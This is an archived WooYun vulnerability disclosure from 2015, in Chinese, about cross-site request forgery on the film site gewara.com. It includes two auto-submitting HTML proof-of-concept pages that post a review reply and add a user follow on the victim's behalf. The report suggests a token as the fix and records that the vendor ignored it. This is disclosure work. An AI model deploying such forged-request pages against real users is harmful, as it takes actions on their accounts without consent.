乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-20: 细节已通知厂商并且等待厂商处理中 2015-07-25: 厂商已经主动忽略漏洞,细节向公众公开
稍微有些影响
影评发布及回复,个人信息修改,关注都可CSRF,就以回复和关注为例子回复:
<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>this is a crsf test</title></head><body> <form action="http://www.gewara.com/activity/ajax/sns/replyComment.xhtml" method="Post"> <input type="hidden" name="body" value="test" />//内容 <input type="hidden" name="commentid" value="93796763" />影评id </form> <script> document.forms[0].submit(); </script></body></html
成功
关注
<html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>this is a crsf test</title></head><body> <form action="http://www.gewara.com/activity/community/ajax/addAttention.xhtml" method="Post"> <input type="hidden" name="attentionid" value="46343616" />//被关注用户id </form> <script> document.forms[0].submit(); </script></body></html>
粉丝+1
加个token
危害等级:无影响厂商忽略
忽略时间:2015-07-25 11:44
暂无